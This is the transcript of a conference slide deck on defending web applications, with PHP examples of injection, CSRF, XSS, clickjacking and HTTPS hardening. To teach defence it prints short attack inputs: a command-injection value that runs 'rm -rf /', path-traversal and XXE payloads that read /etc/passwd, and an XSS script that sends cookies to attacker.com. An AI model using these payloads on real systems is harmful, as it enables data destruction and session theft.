Proactive web security

Transcript

1. @BastianHofmann Proactive Web Security Bastian Hofmann

2. Thinking about Security is important

3. • 2013/14 • 3 billion user accounts

4. • 2016 • 145 million user accounts

5. • 2016 • 412 million user accounts

6. • 2011 • 77 million user accounts
 $171 million loss

7. • 2017 • Personal Information of
 143 million consumers

8. …

9. Everyone is a target for attackers

10. So let’s think about the harmful things a hacker can

    do

11. And what we can do to prevent them

12. Disclaimer

13. None of these lists are ever complete

14. Stay up-to-date

15. Also

16. Every topic starts basic and will get more advanced quickly

17. None

18. Try to get access to the database

19. Use authentication and TLS

20. Do not expose your databases to the internet

21. “There are nearly 30,000 [MongoDB] instances on the Internet that

    don't have any authorization enabled” https:/ /blog.shodan.io/its-the-data-stupid/

22. $ mongo yoursite.com

23. Scan your public IPs for open ports

24. nmap

25. $ nmap scanme.nmap.org Starting Nmap 7.60 … Not shown: 994

    closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 9929/tcp open nping-echo

26. $ nmap www.researchgate.net Starting Nmap 7.60 … PORT STATE SERVICE

    80/tcp open http 443/tcp open https

27. These are still two open ports

28. Attack vector

29. Bugs in your software

30. Injections

31. SQL Injection

32. <?php $userId = $_GET[‘userId’]; $sql = ‘SELECT * FROM users

    WHERE id =‘ . $userId; $mysqli->query($sql);

33. <?php // 12 OR TRUE $userId = $_GET[‘userId’]; $sql =

    ‘SELECT * FROM users WHERE id =‘ . $userId; $mysqli->query($sql);

34. Escape

35. <?php $name = $_GET[‘name’]; $name = $mysqli->real_escape_string($name); $sql = ‘SELECT

    * FROM users WHERE name = ’ . $name; $mysqli->query($sql);

36. Use an ORM

37. http:/ /www.doctrine- project.org/projects/ orm.html

38. <?php $userId = (int) $_GET[‘userId’]; $user = $entityManager->find( ‘User’, $userId

    );

39. Use prepared statements

40. <?php $userId = (int) $_GET[‘userId’]; $rsm = new ResultSetMapping(); $query

    = $entityManager->createNativeQuery( 'SELECT * FROM users WHERE userId = ?', $rsm ); $query->setParameter(1, $userId); $users = $query->getResult();

41. There are more types of injections

42. Injection in HTTP requests

43. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', 'https://api.com/path/?id='

    . $_GET[‘id'] );

44. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', //

    6&admin=true 'https://api.com/path/?id=' . $_GET[‘id'] );

45. Always escape

46. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', 'https://api.com/path/?id='

    . urlencode($_GET[‘id’]) );

47. Use sensible libraries

48. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', 'https://api.com/path/',

    ['query' => ['id' => $_GET['id']]] );

49. Command injection

50. <?php $logFile = $_GET['logFile']; passthru( 'cat ' . __DIR__ .

    '/logs/' . $logFile );

51. <?php // foo.log && rm -rf / $logFile = $_GET['logFile'];

    passthru( 'cat ' . __DIR__ . '/logs/' . $logFile );

52. Always escape

53. <?php $logFile = $_GET['logFile']; passthru( 'cat ' . escapeshellarg( __DIR__

    . '/logs/' . $logFile ) );

54. Path traversals

55. <?php // ../../../etc/passwd $logFile = $_GET['logFile']; passthru( 'cat ' .

    escapeshellarg( __DIR__ . '/logs/' . $logFile ) );

56. Validation

57. <?php $logFile = $_GET['logFile']; if (!preg_match('/^[a-z]+\.log$/', $logFile) { throw new

    \Exception('Invalid file name'); } passthru( 'cat ' . escapeshellarg( __DIR__ . '/' . $logFile ) );

58. <?php $logFile = $_GET['logFile']; $file = realpath(__DIR__ . '/logs/' .

    $logFile); if (dirname($file) !== __DIR__ . '/logs') { throw \Exception('Invalid file'); } passthru( 'cat ' . escapeshellarg( $file ) );

59. Code injection

60. <?php $myvar = "varname"; $x = $_GET['arg']; eval("\$myvar = \$x;");

61. Do not use eval or create_function

62. XML Entity Injection

63. <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY >

    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

64. Disable entity loading

65. <?php // set this very early in your request libxml_disable_entity_loader(true);

66. Only enable it, if you really need it

67. Trusted SOAP APIs over TLS

68. <?php function dangerouslyEnableXmlEntityLoader( callable $f ) { try { libxml_disable_entity_loader(false);

    return $f(); } finally { libxml_disable_entity_loader(true); } }

69. If the attacker can’t find any injection vulnerabilities

70. Trying to find bugs in libraries you use

71. Keep things up to date

72. Check for known security vulnerabilities

73. None

74. https:/ /github.com/ sensiolabs/security- checker

75. $ php security-checker security:check ./composer.lock Symfony Security Check Report =============================

    [OK] No packages have known vulnerabilities.
76. None

77. $ npm audit (+) No known vulnerabilities found

78. Trying to find bugs in your infrastructure

79. Web-Server

80. PHP

81. OS

82. …

83. Keep things up to date

84. Scan for known vulnerabilities

85. https:/ /github.com/ future-architect/vuls

86. localhost (centos7.3.1611) ========================== Total: 109 (High:35 Medium:55 Low:16 ?:3) 31

    updatable packages CVE-2015-2806 10.0 HIGH (nvd) Stack-based buffer overflow in asn1_der_decoding in libtasn1 before 4.4 allows remote attackers to have unspecified impact via unknown vectors.

87. If there are no vulnerabilities so far

88. Try to take over accounts

89. Man-in-the-middle attacks

90. HTTP is plain text

91. Very easy to read and modify on the wire

92. Public WiFis

93. $ sudo tcpdump -v port 80

94. $ curl http://google.com

95. 14:06:40.337900 IP6 (flowlabel 0xbb911, hlim 57, next- header TCP (6)

    payload length: 549) muc11s14-in-x0e. 1e100.net.http > 2a02:8109:9880:2e9c:94b4:a371:f1b3:b82b. 60808: Flags [P.], cksum 0x4ae9 (correct), seq 1:518, ack 75, win 106, options [nop,nop,TS val 2632812618 ecr 335746159], length 517: HTTP, length: 517 HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Location: http://www.google.de/? gfe_rd=cr&dcr=0&ei=4LJYWo6FFKiF8Qe9w63gAQ Content-Length: 268 Date: Fri, 12 Jan 2018 13:06:40 GMT

96. Encrypt the traffic

97. TLS

98. But “TLS is slow and expensive”

99. https:/ /letsencrypt.org/

100. https:/ /istlsfastyet.com/

101. Check config

102. https:/ /www.ssllabs.com/ ssltest

103. None

104. What happens when you enter a URL into the address

     bar?
105. None

106. $ curl -I http://www.researchgate.net HTTP/1.1 301 Moved Permanently Content-Length: 178

     Content-Type: text/html Date: Fri, 12 Jan 2018 13:02:35 GMT Location: https://www.researchgate.net/ Server: nginx Connection: keep-alive

107. Man-in-the-Middle Attack on initial redirect

108. Strict-Transport-Security https:/ /developer.mozilla.org/en-US/docs/Web/HTTP/Headers/S

109. strict-transport-security: max-age=15552000; includeSubDomains; preload

110. chrome:/ /net-internals/ #hsts

111. Man-in-the-Middle Attack on the very first time the user visits

     a site

112. Browser Preloads

113. strict-transport-security: max-age=15552000; includeSubDomains; preload

114. https:/ /hstspreload.org/

115. So no man-in-the middle

116. Brute force to guess the password

117. Ratelimits

118. Captchas

119. None

120. Log logins

121. Alert user of logins on a new device

122. None

123. Remote logout

124. None

125. Two-Factor-Authentication

126. “Less then 10 percent of all google users use Two-Factor-

     Authentication” http:/ /uk.pcmag.com/news/92919/most-google-accounts-dont-use-two-factor- authentication

127. E-Mail only logins

128. None
129. None
130. None
131. None
132. None

133. Works great on mobile where entering a password is tedious

134. Getting into the accounts directly is not possible or very

     expensive

135. Doing actions on the user’s behalf without direct account takeover

136. Cross Site Request Forgery

137. http:/ /site.com/ deleteCurrentAccount

138. Session cookie is necessary for the request to work

139. On the site of an attacker

140. <img src=“http://site.com/deleteCurrentAccount" />

141. The browser automatically adds the session cookie when the image

     is fetched

142. Or an email with “Hey click on http:/ /bit.ly/2n1b42n to

     win”

143. Don’t support GET requests for writing operations

144. Though that does not help

145. On the site of an attacker

146. <form method="POST" id="form" action="http://site.com/deleteCurrentAccount"> </form> <script> document.getElementById("form") .submit() </script>

147. CSRF tokens

148. Create token that has the Session ID cookie value encrypted

149. <?php $plaintext = $sessionId . '/' . $userId . '/'

     . time(); $nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES); $token = base64_encode($nonce . sodium_crypto_secretbox($plaintext, $nonce, $key));

150. Add this token to every non GET request

151. <form method="POST" id="form" action=“http://site.com/deleteCurrentAccount"> <input type="hidden" name="csrf_token" value="<?php echo $token

     ?>" /> </form>

152. Same for XHR requests

153. Verify that the content of the token matches the session

     from the cookie

154. <?php $token = $_POST['csrf_token']; $nonce = substr( $token, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES

     ); $crypt = substr( $token, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES ); $plaintext = sodium_crypto_secretbox_open($crypt, $nonce, $key); [$sessionId, $userId, $time] = explode('/', $plaintext); // …

155. if ( $sessionId !== session_id() || $userId !== $_SESSION['userId'] ||

     time() - $time > 7200 ) { throw \Exception('Invalid csrf token'); }

156. Because of the Cross Origin Policy an attacker can not

     get hold of a matching CSRF token

157. Libraries / Frameworks

158. https:/ /symfony.com/ doc/current/security/ csrf.html

159. Same Site Cookies

160. Browser only sends cookie in a “first-party-context”

161. http:/ / www.sjoerdlangkemper.nl /2016/04/14/preventing- csrf-with-samesite- cookie-attribute/

162. Set-Cookie: sessionid=...; Secure; HttpOnly; SameSite=strict

163. https:/ /wiki.php.net/rfc/ same-site-cookie

164. https:/ /caniuse.com/ #feat=same-site-cookie- attribute

165. None

166. But there are other ways to do something on behalf

     of the user

167. XSS Injection

168. <html> <body> <div> User generated comment that comes from database

     </div> </body> </html>

169. <html> <body> <div> <?php echo $comment; ?> </div> </body> </html>

170. <html> <body> <div> User generated comment <script> fetch( 'http://attacker.com/?cookies=' +

     document.cookie ) </script> that comes from database </div> </body> </html>

171. Escape content

172. <html> <body> <div> <?php echo htmlspecialchars($comment); ?> </div> </body> </html>

173. Template libraries

174. https:/ / twig.symfony.com/

175. {% autoescape "html" %} <html> <body> <div> {{ comment }}

     </div> </body> </html> {% endautoescape %}

176. https:/ / mustache.github.io/

177. <html> <body> <div> {{comment}} </div> </body> </html>

178. Frontend frameworks

179. https:/ /reactjs.org/

180. What if you want to allow certain HTML tags

181. Formatting, Links, Paragraphes, …

182. HTML Purifier

183. http:/ /htmlpurifier.org/

184. $config = HTMLPurifier_Config::createDefault(); $purifier = new HTMLPurifier($config); $cleanHtml = $purifier->purify($dirtyHtml);

185. ... or just use Markdown

186. It’s easy to make errors

187. Try to limit the impact

188. HTTPS only Cookies

189. Set-Cookie: sessionid=...; Secure; HttpOnly

190. $expire = 0; $path = ''; $domain = ''; $secure

     = true; $httpOnly = true; setcookie( 'sessionId', '...', $expire, $path, $domain, $secure, $httpOnly );

191. Content Security Policy

192. https:/ / developer.mozilla.org/en- US/docs/Web/HTTP/CSP

193. Content-Security-Policy: default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self'; style-src

     'self';
194. None

195. Reporting

196. Content-Security-Policy: default-src … report-uri / csp_errors;

197. Do not allow inline script tags

198. But if you must

199. CSP Nonces

200. Content-Security-Policy: script-src 'nonce-2726c7f26c'

201. <script nonce="2726c7f26c">...</script>

202. This can still be bypassed

203. Malicious JS NPM packages

204. https:/ /hackernoon.com/im-harvesting- credit-card-numbers-and-passwords-from- your-site-here-s-how-9a8cb347c5b5

205. Trying to trick user into providing sensitive information

206. Phishing

207. Mostly hard to prevent because it is out of your

     control

208. But some attack vectors are preventable

209. Clickjacking

210. None
211. None

212. <html> <body> <iframe src="https://www.researchgate.net/login"> </iframe> <script> ... </script> </body> </html>

213. No direct access to page in IFRAME possible

214. Invisible input boxes overlaying the IFRAME
 to capture input

215. Forbid displaying your page in an IFRAME

216. X-Frame-Options: SAMEORIGIN

217. Tabnabbing

218. <a href="http://external.page" target="_blank"> Link </a>

219. Common for linking URLs in user provided content

220. In the opened window

221. <script> if (window.opener) { opener.location = 'http://phishing-site.com'; } </script>

222. Prevention

223. <a href="http://external.page" target="_blank" rel="noopener"> Link </a>

224. https:/ / mathiasbynens.github.io/ rel-noopener/

225. So that was a lot of information

226. Let’s sum it up

227. The internet is a scary place

228. If you have users you’re a target

229. Stay alert

230. Invest into good security practices

231. There is always more

232. Stay up to date

233. http:/ /speakerdeck.com/ u/bastianhofmann

234. [email protected] https:/ /twitter.com/BastianHofmann

235. Resources • https://www.owasp.org • https://twitter.com/miss_jwo/status/957555207868690434

236. Backup slides

237. Speaking of URL’s in user generated content

238. Spot the difference

239. researchgate.net/login rеsearchgate.net/login

240. researchgate.net/login rеsearchgate.net/login This is a cyrillic “e”

241. International domain names

242. https:/ /en.wikipedia.org/ wiki/ IDN_homograph_attack

243. Warn the user before browsing to a IDN URL

244. None

245. Warn on misspellings

246. reserchgate.net/login

247. researchgate.tv/login

248. researchgate.education/login

249. researchgate.attacker.com/login

250. Follow redirects

251. http:/ /bit.ly/1bdDlXc

252. None

253. Still HTML/XSS injection vulnerabilities are bad

254. Try to detect them

255. In your template library

256. https:/ / mustache.github.io/

257. Every time something gets escaped, also replace “e” with an

     escape sequence

258. Before returning the resulting HTML

259. Check if there are any “e” characters left

260. If yes, log this as a potential XSS vulnerability

261. Replace the escape sequence back to “e”

262. <div class="some-name"> {{firstName}} {{{lastName}}} </div>

263. firstName: Peter lastName: Parker

264. <div class="som___101___-nam___101___"> P___101___t___101___r Parker </div>

265. <div class="som___101___-nam___101___"> P___101___t___101___r Parker </div>

266. Self XSS

267. “Hey open the developer tools and paste this code there

     to get special features”

268. Add console warning

269. None

270. <script> if ( typeof console === 'object' && console.log )

     { console.log( '%cWARNING!', 'color:white; background:red;' ); ... } </script>

271. Check for internal IPs

272. None

273. With everything you do

274. Log and monitor sensitive operations

275. Alerts on suspicious behaviour

276. Web Application Firewalls

277. Ability to quickly block traffic patterns

278. Linking URLs in user generated content

279. Information disclosure through Referrer

280. https:/ / developer.mozilla.org/en- US/docs/Web/HTTP/ Headers/Referer

281. Referrer Policy

282. Referrer-Policy: origin-when-cross-origin

283. https:/ / developer.mozilla.org/en- US/docs/Web/HTTP/ Headers/Referrer-Policy